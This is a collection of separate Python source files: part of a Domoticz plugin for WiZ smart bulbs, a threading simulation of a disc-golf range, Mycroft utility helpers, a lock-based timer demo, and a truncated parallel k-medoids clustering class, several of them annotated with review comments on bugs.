        Domoticz.Log('Sending command for DeviceID='+Devices[Unit].DeviceID)
        host = str(Devices[Unit].DeviceID)
        port = 38899
        # Control device and update status in Domoticz
        if Command == 'On':
            mJSON = b'{"method":"setPilot","params":{"src":"udp","state":true}}'
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            try:
                sock.sendto(mJSON, (host, port))
                received = sock.recv(1024).decode('utf-8')
            finally:
                sock.close()
            # NOTE(review): if sendto/recv raises, `received` is unbound and the
            # next line raises NameError; also `not received` on a non-empty
            # string is always False, so TimedOut is effectively never set —
            # confirm whether that is intended.
            received=str(received).split(",")[2].split(":")[2]
            received=received[0:len(received)-3].capitalize()
            UpdateDevice(Unit, 1, 'On', not received)
        elif Command == 'Off':
            mJSON = b'{"method":"setPilot","params":{"src":"udp","state":false}}'
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            try:
                sock.sendto(mJSON, (host, port))
                received = sock.recv(1024).decode('utf-8')
            finally:
                sock.close()
            received=str(received).split(",")[2].split(":")[2]
            received=received[0:len(received)-3].capitalize()
            UpdateDevice(Unit, 0, 'Off', not received)
        elif Command == 'Set Color':
            # Convert RGB to Cold- and White level
            rgb = json.loads(Color)
            mode = rgb.get("m")
            r = rgb.get("r")
            g = rgb.get("g")
            b = rgb.get("b")
            cw = rgb.get("cw")
            ww = rgb.get("ww")
            # SubType 8 = tunable white: only send cold/warm channels;
            # otherwise send the full RGB + cold/warm payload.
            if Devices[Unit].SubType == 8:
                mJSON = bytes('{"method":"setPilot","params":{"src":"udp","state":true,"dimming":' + str(Level) + ',"c":' + str(cw) + ',"w":' + str(ww) + '}}', 'utf-8')
            else:
                mJSON = bytes('{"method":"setPilot","params":{"src":"udp","state":true,"dimming":' + str(Level) + ',"r":' + str(r) + ',"g":' + str(g) + ',"b":' + str(b) + ',"c":' + str(cw) + ',"w":' + str(ww) + '}}', 'utf-8')
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            try:
                sock.sendto(mJSON, (host, port))
                received = sock.recv(1024).decode('utf-8')
            finally:
                sock.close()
            received=str(received).split(",")[2].split(":")[2]
            received=received[0:len(received)-3].capitalize()
            # Update status of Domoticz device
            Devices[Unit].Update(nValue=1, sValue=str(Level), TimedOut=not received, Color=Color)
        elif Command == 'Set Level':
            # Set new level
            mJSON = bytes('{"method":"setPilot","params":{"src":"udp","state":true,"dimming":' + str(Level) + '}}', 'utf-8')
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            try:
                sock.sendto(mJSON, (host, port))
                received = sock.recv(1024).decode('utf-8')
            finally:
                sock.close()
            received=str(received).split(",")[2].split(":")[2]
            received=received[0:len(received)-3].capitalize()
            # Update status of Domoticz device
            UpdateDevice(Unit, 1 if Devices[Unit].Type == 241 else 2, str(Level), not received)
        # Set last update
        self.last_update = time.time()
    def onNotification(self, Name, Subject, Text, Status, Priority, Sound, ImageFile):
        """Log any notification Domoticz pushes to the plugin; nothing else."""
        Domoticz.Debug("Notification: " + Name + "," + Subject + "," + Text + "," + Status + "," + str(Priority) + "," + Sound + "," + ImageFile)

    def onDisconnect(self, Connection):
        """Disconnect callback; unused — this plugin sends raw UDP directly."""
        Domoticz.Debug("onDisconnect called")
    def onHeartbeat(self):
        """Periodic callback: at most once per minute, launch a background
        refresh of all bulb states."""
        Domoticz.Debug("onHeartbeat called time="+str(time.time()))
        # If it hasn't been at least 1 minute (corrected for ~2s runtime) since last update, skip it
        if time.time() - self.last_update < 58:
            return
        # Create/Start update thread
        self.updateThread = threading.Thread(name="WiZUpdateThread", target=BasePlugin.handleThread, args=(self,))
        self.updateThread.start()
    # Separate thread looping ever 10 seconds searching for new WiZ connected devices on network and updating their status
    def handleThread(self):
        """Background worker: re-discover bulbs, poll each known device over
        UDP getPilot and mirror its state (on/off, dimming, color) into
        Domoticz; create devices for newly discovered bulbs."""
        try:
            Domoticz.Debug("in handlethread")
            # Initialize/Update WiZ devices
            # Set last update
            self.last_update = time.time()
            # Update devices
            bulbs = self.loop.run_until_complete(self.discovery(False))
            for bulb in bulbs:
                bulb_type = asyncio.run(bulb.get_bulbtype())
                Domoticz.Debug("Endpoint '"+bulb.ip+"' found.")
                deviceFound = False
                # NOTE(review): indentation reconstructed from a flattened
                # source — as written this polls every registered device once
                # per discovered bulb; confirm against the original plugin.
                for Device in Devices:
                    if ((bulb.ip == Devices[Device].DeviceID)): deviceFound = True
                    host = str(Devices[Device].DeviceID)
                    port = 38899
                    mJSON = b'{"method":"getPilot"}'
                    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                    try:
                        sock.sendto(mJSON, (host, port))
                        received = sock.recv(1024).decode('utf-8')
                    finally:
                        sock.close()
                    received=json.loads(received)
                    # nValue 1 = on, 0 = off
                    wizstate=received["result"]["state"]
                    if wizstate:
                        wizstate = 1
                    else:
                        wizstate = 0
                    wizlevel=str(received["result"]["dimming"])
                    if Devices[Device].Color != "":
                        # Merge the bulb-reported channels into the stored color JSON.
                        c=json.loads(Devices[Device].Color)
                        if 'c' in received["result"] and 'w' in received["result"]:
                            c["cw"] = wizcw=received["result"]["c"]
                            c["ww"] = wizww=received["result"]["w"]
                        if 'r' in received["result"] and 'g' in received["result"] and 'b' in received["result"]:
                            c["r"] = received["result"]["r"]
                            c["g"] = received["result"]["g"]
                            c["b"] = received["result"]["b"]
                        if 'temp' in received["result"]:
                            wiztemp=received["result"]["temp"]
                            # presumably maps the reported kelvin value onto
                            # Domoticz's temperature scale — confirm the 14.9 factor
                            c["t"] = (wiztemp - 2700) / 14.9
                        wizcolor=json.dumps(c)
                    else:
                        wizcolor=""
                    # Update status of Domoticz device
                    Devices[Device].Update(nValue=wizstate, sValue=wizlevel, TimedOut=False, Color=wizcolor)
                if (deviceFound == False):
                    # New bulb: create its Domoticz device (Subtype 4 = RGBWW, 8 = tunable white)
                    if bulb_type.features.color:
                        Domoticz.Device(Name=bulb_type.name, DeviceID=bulb.ip, Unit=len(Devices)+1, Type=241, Subtype=4, Switchtype=7, Image=0).Create()
                    else:
                        Domoticz.Device(Name=bulb_type.name, DeviceID=bulb.ip, Unit=len(Devices)+1, Type=241, Subtype=8, Switchtype=7, Image=0).Create()
        except Exception as err:
            # Broad catch so a transient network error never kills the worker thread.
            Domoticz.Error("handleThread: "+str(err)+' line '+format(sys.exc_info()[-1].tb_lineno))
global _plugin
_plugin = BasePlugin()
def onStart():
global _plugin
_plugin.onStart()
def onStop():
global _plugin
_plugin.onStop()
def onConnect(Connection, Status, Description):
global _plugin
_plugin.onConnect(Connection, Status, Description)
def onMessage(Connection, Data):
    """Domoticz entry point: forward an incoming message to the singleton."""
    _plugin.onMessage(Connection, Data)
def onCommand(Unit, Command, Level, Color):
    """Domoticz entry point: forward a device command to the singleton."""
    _plugin.onCommand(Unit, Command, Level, Color)
def onNotification(Name, Subject, Text, Status, Priority, Sound, ImageFile):
    """Domoticz entry point: forward a notification event to the singleton."""
    _plugin.onNotification(Name, Subject, Text, Status, Priority, Sound, ImageFile)
def onDisconnect(Connection):
    """Domoticz entry point: forward a disconnection event to the singleton."""
    _plugin.onDisconnect(Connection)
def onHeartbeat():
    """Domoticz entry point: forward the periodic heartbeat to the singleton."""
    _plugin.onHeartbeat()
# Generic helper functions
def DumpConfigToLog():
    """Debug-log every non-empty plugin parameter and a summary of each device."""
    for key in Parameters:
        value = Parameters[key]
        if value != "":
            Domoticz.Debug("'" + key + "':'" + str(value) + "'")
    Domoticz.Debug("Device count: " + str(len(Devices)))
    for unit in Devices:
        device = Devices[unit]
        Domoticz.Debug("Device: " + str(unit) + " - " + str(device))
        Domoticz.Debug("Device ID: '" + str(device.ID) + "'")
        Domoticz.Debug("Device Name: '" + device.Name + "'")
        Domoticz.Debug("Device nValue: " + str(device.nValue))
        Domoticz.Debug("Device sValue: '" + device.sValue + "'")
        Domoticz.Debug("Device LastLevel: " + str(device.LastLevel))
    return
# Loop thru domoticz devices and see if there's a device with matching DeviceID, if so, return unit number, otherwise return zero
def getUnit(devid):
    """Return the unit number of the device whose DeviceID equals *devid*, else 0."""
    for candidate in Devices:
        if Devices[candidate].DeviceID == devid:
            return candidate
    return 0
# Find the smallest unit number available to add a device in domoticz
def nextUnit():
    """Return the smallest unit number (1..255) not yet used by a device."""
    candidate = 1
    while candidate < 255 and candidate in Devices:
        candidate += 1
    return candidate
def UpdateDevice(Unit, nValue, sValue, TimedOut):
    """Update a Domoticz device, guarding against devices deleted by the user."""
    if Unit not in Devices:
        return
    Devices[Unit].Update(nValue=nValue, sValue=str(sValue), TimedOut=TimedOut)
    Domoticz.Log("Update "+str(nValue)+":'"+str(sValue)+"' ("+Devices[Unit].Name+") TimedOut="+str(TimedOut))
    return
|
1_disc_golf_range.py | import threading
from threading import Thread, Semaphore, Lock
import random
from time import sleep
#configurable variables
STASH = 25          # discs initially available at the stash
BUCKET_SIZE = 5     # discs handed out per bucket request
NUM_FROLFERS = 5    # number of frolfer (player) threads to spawn
#Locking Structures
stashLock = Lock()      # guards reads/writes of STASH
fieldLock = Lock()      # guards discs_on_field and cart/field access
stashEmpty = Semaphore(0)   # frolfers signal the cart when the stash runs low
stashFull = Semaphore(0)    # cart signals frolfers after refilling the stash
#other global vars
discs_on_field = 0  # discs currently lying on the field, awaiting the cart
rng = random.Random()
rng.seed(50)        # fixed seed for reproducible runs
#aux functions
def delimiter():
    """Print a separator row used to highlight cart activity in the output."""
    separator = "#################################################################"
    print(separator)
def frolfer(thread_id):
    """Player thread: repeatedly fetch a bucket of discs from the stash and
    throw them onto the field one at a time.

    Synchronization: stashLock guards STASH; when the stash cannot fill a
    bucket the frolfer signals the cart (stashEmpty) and blocks on stashFull
    until the cart restocks. fieldLock guards discs_on_field.
    Runs forever; intended to be started as a thread from main().
    """
    global STASH, BUCKET_SIZE, NUM_FROLFERS
    global discs_on_field
    global rng
    global stashLock, fieldLock, stashEmpty, stashFull
    bucket = 0
    while True:
        # Keep trying until we manage to take a full bucket from the stash.
        while bucket == 0:
            stashLock.acquire()
            print ("Frolfer", thread_id, "calling for a bucket")
            if STASH < BUCKET_SIZE:
                stashEmpty.release() # stash is empty. Signal cart
                # NOTE(review): stashLock is still held while waiting here;
                # the cart only takes fieldLock, so this does not deadlock,
                # but other frolfers are blocked until this one proceeds.
                stashFull.acquire() # wait for stash to be full
                if STASH < BUCKET_SIZE: # if cart STILL didn't bring enough discs
                    stashLock.release()
                    continue # go back to top of while bucket == 0 loop
            if STASH >= BUCKET_SIZE:
                STASH -= BUCKET_SIZE # acquire a bucket
                bucket += BUCKET_SIZE
                print ("Frolfer", thread_id, "got", bucket, "discs; Stash =", STASH)
            stashLock.release()
        # Throw each disc in the bucket onto the field, pausing between throws.
        for i in range(0, bucket):
            fieldLock.acquire()
            discs_on_field += 1
            print ("Frolfer", thread_id, "threw disc", i)
            fieldLock.release()
            sleep(rng.random() * 5)
        bucket = 0
def cart():
    """Cart thread: wait until a frolfer reports the stash is empty, then
    sweep every disc off the field back into the stash.

    Synchronization: blocks on stashEmpty, holds fieldLock while collecting
    (so no frolfer can throw during collection), then releases stashFull to
    wake the waiting frolfer. Runs forever; started as a thread from main().
    """
    global STASH, BUCKET_SIZE, NUM_FROLFERS
    global discs_on_field
    global rng
    global stashLock, fieldLock, stashEmpty, stashFull
    while True:
        stashEmpty.acquire() # block until stash is empty
        fieldLock.acquire()
        sleep(rng.random() * 2)
        delimiter()
        initial_stash = STASH
        discs_collected = discs_on_field
        # NOTE(review): STASH is modified here without stashLock; safe only
        # because the signalling frolfer still holds stashLock while it waits
        # on stashFull -- confirm if frolfer() is ever changed.
        print("Stash =", initial_stash,"; Cart entering field")
        STASH += discs_on_field
        discs_on_field = 0
        print("Cart done, gathered", discs_collected, "dics; Stash = ", STASH)
        delimiter()
        fieldLock.release()
        stashFull.release() # signal frolfers that are waiting on the stash to release
        sleep(rng.random() * 5)
def main():
    """Spawn the cart thread and NUM_FROLFERS frolfer threads."""
    Thread(target=cart).start()
    for frolfer_id in range(NUM_FROLFERS):
        Thread(target=frolfer, args=[frolfer_id]).start()
# Only start the simulation when run as a script, not when imported
# (previously main() ran unconditionally at import time).
if __name__ == "__main__":
    main()
|
__init__.py | # Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import socket
import subprocess
from os.path import join, expanduser
from threading import Thread
from time import sleep
import json
import os.path
import psutil
from stat import S_ISREG, ST_MTIME, ST_MODE, ST_SIZE
import requests
import signal as sig
import mycroft.audio
import mycroft.configuration
from mycroft.util.format import nice_number
# Officially exported methods from this file:
# play_wav, play_mp3, get_cache_directory,
# resolve_resource_file, wait_while_speaking
from mycroft.util.log import LOG
from mycroft.util.parse import extract_datetime, extractnumber, normalize
from mycroft.util.signal import *
def resolve_resource_file(res_name):
    """Convert a resource into an absolute filename.

    Resource names are in the form: 'filename.ext'
    or 'path/filename.ext'

    Search order: the literal path itself, then ~/.mycroft/<res_name>,
    then <data_dir>/<res_name> from the configuration, and finally the
    'mycroft/res' folder of the installed source package.

    Args:
        res_name (str): a resource path/name

    Returns:
        str or None: absolute path of the first match, or None if the
        resource cannot be resolved.
    """
    config = mycroft.configuration.Configuration.get()

    # Fully qualified file (e.g. a user setting)
    if os.path.isfile(res_name):
        return res_name

    # User override folder
    user_path = os.path.expanduser("~/.mycroft/" + res_name)
    if os.path.isfile(user_path):
        return user_path

    # Configured data directory (e.g. /opt/mycroft)
    data_dir = expanduser(config['data_dir'])
    data_path = os.path.expanduser(join(data_dir, res_name))
    if os.path.isfile(data_path):
        return data_path

    # Bundled resources inside the source package
    pkg_path = os.path.join(os.path.dirname(__file__), '..', 'res', res_name)
    pkg_path = os.path.abspath(os.path.normpath(pkg_path))
    if os.path.isfile(pkg_path):
        return pkg_path

    return None  # Resource cannot be resolved
def play_wav(uri):
    """Launch the configured WAV player on *uri* and return the Popen handle.

    The command line comes from the 'play_wav_cmdline' config entry; the
    '%1' placeholder token is replaced with the (http-downgraded) uri.
    """
    config = mycroft.configuration.Configuration.get()
    cmdline = str(config.get("play_wav_cmdline")).split(" ")
    args = [get_http(uri) if token == "%1" else token for token in cmdline]
    return subprocess.Popen(args)
def play_mp3(uri):
    """Launch the configured MP3 player on *uri* and return the Popen handle.

    The command line comes from the 'play_mp3_cmdline' config entry; the
    '%1' placeholder token is replaced with the (http-downgraded) uri.
    """
    config = mycroft.configuration.Configuration.get()
    cmdline = str(config.get("play_mp3_cmdline")).split(" ")
    args = [get_http(uri) if token == "%1" else token for token in cmdline]
    return subprocess.Popen(args)
def record(file_path, duration, rate, channels):
    """Start an 'arecord' capture into *file_path* and return the Popen handle.

    A duration <= 0 records until the process is terminated externally.
    """
    command = ["arecord", "-r", str(rate), "-c", str(channels)]
    if duration > 0:
        command += ["-d", str(duration)]
    command.append(file_path)
    return subprocess.Popen(command)
def get_http(uri):
    """Return *uri* with every 'https://' occurrence downgraded to 'http://'."""
    insecure = uri.replace("https://", "http://")
    return insecure
def remove_last_slash(url):
    """Strip a single trailing '/' from *url*; falsy urls are returned as-is."""
    if not url:
        return url
    return url[:-1] if url.endswith('/') else url
def read_stripped_lines(filename):
    """Read *filename* and return a list of its lines, whitespace-stripped."""
    with open(filename, 'r') as handle:
        stripped = [current.strip() for current in handle]
    return stripped
def read_dict(filename, div='='):
    """Read a key/value file into a dict.

    Each line is split on the FIRST occurrence of *div*; text before it
    becomes the key and everything after it the value (both stripped).
    Splitting only once fixes a crash (ValueError on unpacking) when a
    value itself contains the divider, e.g. 'url=http://host/a=b'.

    Args:
        filename (str): path of the file to read
        div (str): key/value divider, '=' by default

    Returns:
        dict: mapping of stripped keys to stripped values
    """
    d = {}
    with open(filename, 'r') as f:
        for line in f:
            key, val = line.split(div, 1)
            d[key.strip()] = val.strip()
    return d
def connected():
    """ Check connection by connecting to 8.8.8.8, if this is
    blocked/fails, Microsoft NCSI is used as a backup

    Returns:
        True if internet connection can be detected
    """
    if connected_dns():
        return True
    return connected_ncsi()
def connected_ncsi():
    """ Check internet connection by retrieving the Microsoft NCSI endpoint.

    Returns:
        True if internet connection can be detected
    """
    try:
        response = requests.get('http://www.msftncsi.com/ncsi.txt')
        return response.text == u'Microsoft NCSI'
    except Exception:
        return False
def connected_dns(host="8.8.8.8", port=53, timeout=3):
    """ Check internet connection by connecting to DNS servers

    Tries *host* first and falls back to 8.8.4.4. Sockets are now always
    closed (the previous implementation leaked one descriptor per call).

    Returns:
        True if internet connection can be detected
    """
    # Thanks to 7h3rAm on
    # Host: 8.8.8.8 (google-public-dns-a.google.com)
    # OpenPort: 53/tcp
    # Service: domain (DNS/TCP)
    socket.setdefaulttimeout(timeout)
    for dns_host in (host, "8.8.4.4"):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.connect((dns_host, port))
            return True
        except IOError:
            pass
        finally:
            s.close()
    return False
def curate_cache(directory, min_free_percent=5.0, min_free_disk=50):
    """Clear out the directory if needed

    This assumes all the files in the directory can be deleted as freely

    Args:
        directory (str): directory path that holds cached files
        min_free_percent (float): percentage (0.0-100.0) of drive to keep free,
            default is 5% if not specified.
        min_free_disk (float): minimum allowed disk space in MB, default
            value is 50 MB if not specified.
    """
    # Simpleminded implementation -- keep a certain percentage of the
    # disk available.
    # TODO: Would be easy to add more options, like whitelisted files, etc.
    space = psutil.disk_usage(directory)

    # convert from MB to bytes
    min_free_disk *= 1024 * 1024
    # space.percent = space.used/space.total*100.0
    percent_free = 100.0 - space.percent
    if percent_free < min_free_percent and space.free < min_free_disk:
        LOG.info('Low diskspace detected, cleaning cache')
        # calculate how many bytes we need to delete
        bytes_needed = (min_free_percent - percent_free) / 100.0 * space.total
        bytes_needed = int(bytes_needed + 1.0)

        # get all entries in the directory w/ stats
        entries = (os.path.join(directory, fn) for fn in os.listdir(directory))
        entries = ((os.stat(path), path) for path in entries)

        # leave only regular files, insert modification date
        entries = ((stat[ST_MTIME], stat[ST_SIZE], path)
                   for stat, path in entries if S_ISREG(stat[ST_MODE]))

        # delete files with oldest modification date until space is freed
        space_freed = 0
        for moddate, fsize, path in sorted(entries):
            try:
                os.remove(path)
                space_freed += fsize
            except OSError:
                # File disappeared or is undeletable -- skip it instead of
                # aborting the cleanup (was a bare ``except``, which also
                # swallowed KeyboardInterrupt/SystemExit).
                pass

            if space_freed > bytes_needed:
                return  # deleted enough!
def get_cache_directory(domain=None):
    """Get a directory for caching data

    This directory can be used to hold temporary caches of data to
    speed up performance. This directory will likely be part of a
    small RAM disk and may be cleared at any time. So code that
    uses these cached files must be able to fallback and regenerate
    the file.

    Args:
        domain (str): The cache domain. Basically just a subdirectory.

    Return:
        str: a path to the directory where you can cache data
    """
    # Local import: tempfile is not in the module-level imports, so the
    # previous os.path.join(tempfile.gettempdir(), ...) raised NameError
    # whenever no "cache_path" was configured.
    import tempfile

    config = mycroft.configuration.Configuration.get()
    directory = config.get("cache_path")
    if not directory:
        # If not defined, use <system tmp>/mycroft/cache
        directory = os.path.join(tempfile.gettempdir(), "mycroft", "cache")
    return ensure_directory_exists(directory, domain)
def validate_param(value, name):
    """Raise ValueError when a required config entry *name* is missing/empty."""
    if value:
        return
    raise ValueError("Missing or empty %s in mycroft.conf " % name)
def is_speaking():
    """Determine if Text to Speech is occurring

    Returns:
        bool: True while still speaking
    """
    warning = ("mycroft.utils.is_speaking() is depreciated, use "
               "mycroft.audio.is_speaking() instead.")
    LOG.info(warning)
    return mycroft.audio.is_speaking()
def wait_while_speaking():
    """Pause as long as Text to Speech is still happening

    Pause while Text to Speech is still happening.  This always pauses
    briefly to ensure that any preceeding request to speak has time to
    begin.
    """
    warning = ("mycroft.utils.wait_while_speaking() is depreciated, use "
               "mycroft.audio.wait_while_speaking() instead.")
    LOG.info(warning)
    return mycroft.audio.wait_while_speaking()
def stop_speaking():
    """Deprecated shim: stop ongoing Text to Speech via mycroft.audio."""
    # TODO: Less hacky approach to this once Audio Manager is implemented
    # Skills should only be able to stop speech they've initiated
    warning = ("mycroft.utils.stop_speaking() is depreciated, use "
               "mycroft.audio.stop_speaking() instead.")
    LOG.info(warning)
    mycroft.audio.stop_speaking()
def get_arch():
    """Return the machine hardware identifier of this host (e.g. 'x86_64')."""
    return os.uname().machine
def reset_sigint_handler():
    """Restore Python's default SIGINT handler.

    This fixes KeyboardInterrupt not getting raised when started via
    start-mycroft.sh.
    """
    default_handler = sig.default_int_handler
    sig.signal(sig.SIGINT, default_handler)
def create_daemon(target, args=(), kwargs=None):
    """Create, start, and return a daemon thread running *target*."""
    worker = Thread(target=target, args=args, kwargs=kwargs, daemon=True)
    worker.start()
    return worker
def wait_for_exit_signal():
    """Blocks until KeyboardInterrupt is received"""
    try:
        # Sleep in long intervals; KeyboardInterrupt interrupts sleep()
        # immediately, so the interval length only affects idle wakeups.
        while True:
            sleep(100)
    except KeyboardInterrupt:
        pass
def create_echo_function(name, whitelist=None):
    """Build a message-bus listener that debug-logs messages for *name*.

    Messages whose type is not in *whitelist* (when given) or is listed in
    the 'ignore_logs' configuration entry are dropped. Registration tokens
    are scrubbed before logging.
    """
    from mycroft.configuration import Configuration
    blacklist = Configuration.get().get("ignore_logs")

    def echo(message):
        """Listen for messages and echo them for logging"""
        try:
            parsed = json.loads(message)
            msg_type = parsed.get("type")
            if whitelist and msg_type not in whitelist:
                return
            if blacklist and msg_type in blacklist:
                return
            if msg_type == "registration":
                # do not log tokens from registration messages
                parsed["data"]["token"] = None
                message = json.dumps(parsed)
        except Exception:
            # Non-JSON payloads are logged verbatim
            pass
        LOG(name).debug(message)
    return echo
|
timer.py | import threading
import time
# Global lock shared by the timer threads: whichever timer acquires it first
# finishes all of its repeats before the other may start ticking.
tLock = threading.Lock()
def timer(name, delay, repeat):
    """Count down *repeat* ticks of *delay* seconds while holding tLock.

    Output is identical to the original, but the Python-2-only ``print``
    statements are converted to ``print()`` calls so the module parses on
    both Python 2 and Python 3.
    """
    print("Timer" + name + ": Started.")
    tLock.acquire()
    print("Timer" + name + ": has acquire the lock.")
    while repeat > 0:
        time.sleep(delay)
        print("Timer" + name + ": " + str(time.ctime(time.time())))
        repeat -= 1
    print("Timer" + name + ": is releasing the lock.")
    tLock.release()
    print("Timer" + name + ": Completed.")
def Main():
    """Start two competing timer threads and report that setup finished.

    ``print`` statements converted to ``print()`` calls for Python 2/3
    compatibility; output is unchanged.
    """
    t1 = threading.Thread(target = timer, args = ("1", 1, 3))
    t2 = threading.Thread(target = timer, args = ("2", 2, 3))
    t1.start()
    t2.start()
    print("Main Completed.")
# Run the demo only when executed directly, not on import.
if __name__ == '__main__':
    Main()
|
kMedoids_parallel.py | # new code in this file from kMedoidsClustering.py Written by Matteo Bjornsson
#################################################################### MODULE COMMENTS ############################################################################
# This file is a mirror of kMedoidsClustering.py but with much of the distortion code parallelized
##################################################################### MODULE COMMENTS ############################################################################
import copy, random
import multiprocessing
import kNN, DataUtility, kMedoidsClustering
import numpy as np
class kMedoids_parallel:
    """Mirror of kMedoidsClustering with the distortion computation spread
    over worker processes.

    A multiprocessing Pool computes per-medoid distortion contributions and
    a Manager queue funnels results back; an accumulator process keeps the
    best (lowest-distortion) medoid replacements. Classification of the
    held-out test data is delegated to kNN over the final medoids.
    """

    #on the creation of a given object run the following
    def __init__(self,
        # number of neighbors in knn
        kNeighbors: int,
        # number of clusters
        kValue: int,
        # data to cluster
        dataSet: np.ndarray,
        # 'mixed', 'categorical', or 'real' data set
        data_type: str,
        # list of integers representing categorical feature column indices
        categorical_features: list,
        # True if the data set is a regression data set
        regression_data_set: bool,
        # weight for real value in distance metric
        alpha: int,
        # weight for categorical value in distance metric
        beta: int,
        # bin width for gaussian kernel smoother
        h: float,
        # dimensionality of data set (# features)
        d: int,
        # pass in the test data set at init
        Testdata: np.ndarray):
        # create a Nearest Neighbor object to single nearest neighbor to input data point
        self.nn = kNN.kNN(1, data_type, categorical_features, regression_data_set, alpha, beta, h, d)
        self.knn = kNN.kNN(kNeighbors, data_type, categorical_features, regression_data_set, alpha, beta, h, d)
        self.categorical_features = categorical_features
        # save which features are real as well by deleting categorical indices from a new list
        real_features = list(range(d))
        for i in categorical_features:
            real_features.remove(i)
        self.real_features = real_features
        self.kValue = kValue
        self.dataSet = dataSet
        # dimensionality of data set
        self.d = d
        # cap on clustering iterations in generate_cluster_medoids()
        self.itermax = 10
        self.Testdata = Testdata
        self.initial_medoids = self.choose_random_medoids()
        self.assignments = []

    #Parameters: N/a
    #Returns: Return the numpy array of medoids
    #Function: Generate a random list of medoids
    def choose_random_medoids(self):
        #Create a new empty array
        indices = []
        #Loop through the number of clusters we are looking at
        for k in range(self.kValue):
            #Set the index to be a random value within the dataset
            index = random.randint(0, len(self.dataSet)-1)
            #make sure the index is unique by generating a new value if the index already exists
            while index in indices:
                #Set the index to a random value in the data set
                index = random.randint(0, len(self.dataSet)-1)
            #Append the index to the array
            indices.append(index)
        #Create an empty list
        medoids = []
        #For each of the indices, pull the sample out as a 1-row 2D array
        for i in indices:
            medoids.append(self.dataSet[i].reshape(1, self.dataSet.shape[1]))
        #Return the numpy array of medoids
        return np.concatenate(medoids)

    #Parameters: Take in a list of points and the list of medoids
    #Returns: Return the nearest medoid
    #Function: find the nearest medoid to given sample, return the medoid index
    def closest_medoid_to_point(self, point: list, medoids: np.ndarray) -> list:
        # use the knn get_neighor class method to find the closest medoid
        medoid = self.nn.get_k_neighbors(medoids, point, k=1)
        # return the medoid index, element 1 of [distance, index, response var]
        return medoid[0][1]

    #Parameters: Take in the list of medoids and all of the data points
    #Returns: Return the medoid assignment for each data point taken in
    #Function: assign each data point in data set to the nearest medoid. This is stored in an array as an integer representing the medoid index at the index of the point belonging to it.
    def assign_all_points_to_closest_medoid(self, medoids: np.ndarray, data: np.ndarray) -> list:
        medoid_assignments = [None] * len(data)
        # for each data point (the last column is the response variable, dropped)
        for i in range(len(data)):
            x = data[i].tolist()[:-1]
            # store the index of the medoid at the index corresponding to the sample position
            medoid_assignments[i] = self.closest_medoid_to_point(x, medoids)
        # return the list of indices
        return medoid_assignments

    #Parameters: Take in the medoids, the medoid assignments and the data array
    #Returns: Returns the distorion value
    #Function: Generate and return the distortion value based on the given points in the medoids
    def distortion(self, medoids: np.ndarray, medoid_assignments: list, data: np.ndarray) -> list:
        #Per-medoid distortion accumulator, one slot per medoid
        distortion = [0] * len(medoids)
        #Loop through the number of indices in the medoids array
        for i in range(len(medoids)):
            #Store the current medoid we are looking at (features only)
            m = medoids[i].tolist()[:-1]
            points_in_cluster = []
            # for the current medoid, look up all examples x that are assigned
            # to that medoid (have a value at their index position in the medoid
            # assignment list that matches the current medoid)
            for n in range(len(medoid_assignments)):
                #store the medoid that point x is assigned to
                x_assignment = medoid_assignments[n]
                # if x is assigned to medoid i (current medoid), append the actual data point to a list
                if x_assignment == i:
                    # get the point and reshape it into a np array that can be concatenated together
                    points_in_cluster.append(data[n].reshape(1, data.shape[1]))
            if len(points_in_cluster) > 0:
                points_in_cluster = np.concatenate(points_in_cluster)
                # use the knn method "get_k_neighbors" to calculate the distance from current medoid m to all points in the cluster
                point_distances = self.nn.get_k_neighbors(points_in_cluster, m, len(points_in_cluster))
                #For each of the points above
                for point in point_distances:
                    distance_from_m = point[0]
                    #Add the squared distance to the distortion for this medoid
                    distortion[i] += (distance_from_m)**2
        #Return the distortion
        return distortion

    # calculate distortion piecewise. Each component of distortion is unique to the medoid
    # and can be calculated with only that medoid and the data set
    def distortion_parallel(self, medoids, medoid_assignments):
        #start some multiprocessing tools
        manager = multiprocessing.Manager()
        q = manager.Queue()
        pool = multiprocessing.Pool()
        # for every medoid, calculate the distortion of that medoid
        # NOTE(review): apply_async is handed the *result* of calling
        # per_medoid_distortion (which has already pushed its answer onto q),
        # not the callable itself -- so this loop actually runs serially in
        # the parent process. The parallel form would be:
        #   pool.apply_async(self.per_medoid_distortion,
        #                    args=(i, medoids[i], medoid_assignments, q))
        for i in range(len(medoids)):
            pool.apply_async(
                self.per_medoid_distortion(i, medoids[i], medoid_assignments, q)
                # callback=log_results
            )
        pool.close()
        pool.join()
        # store all the calculations and return
        distortion = [0] * len(medoids)
        while not q.empty():
            medoid_index, new_distortion = q.get()
            # medoid_index, new_distortion = res.get()
            distortion[medoid_index] = new_distortion
        return distortion

    #Parameters: Take in the medoids, the medoid assignments and the data
    #Returns: return the list of updated medoid values
    #Function: Update all of the medoid feature values
    def update_medoids_parallel(self, medoids: np.ndarray, medoid_assignments: list, data: np.ndarray) -> np.ndarray:
        # calculate the initial distortion in parallel
        initial_distortion = self.distortion_parallel(medoids, medoid_assignments)
        # start some multiprocessing tools
        manager = multiprocessing.Manager()
        q = manager.Queue()
        # accumulator listens for new distortion values generated by workers
        # and keeps them if they are smaller than the current value
        accumulator = multiprocessing.Process(target=self.update_processor, args=(q, medoids, initial_distortion))
        accumulator.start()
        pool = multiprocessing.Pool()
        results = []
        # for every medoid and for every data point, calculate that points distortion
        for j in range(len(medoids)):
            for i in range(len(data)):
                results.append(pool.apply_async(self.queue_new_medoid_i_distortion, args=(q, j, i, initial_distortion[j], medoid_assignments)))
            print()
        pool.close()
        pool.join()
        # sentinel tells the accumulator to publish its result and stop
        q.put('kill')
        # get the final product from the queue, placed by the accumulator
        updated_medoids = q.get()
        # print("updated medoids", updated_medoids)
        accumulator.join()
        # drain worker results (raises any worker exception here)
        for r in results:
            r = r.get()
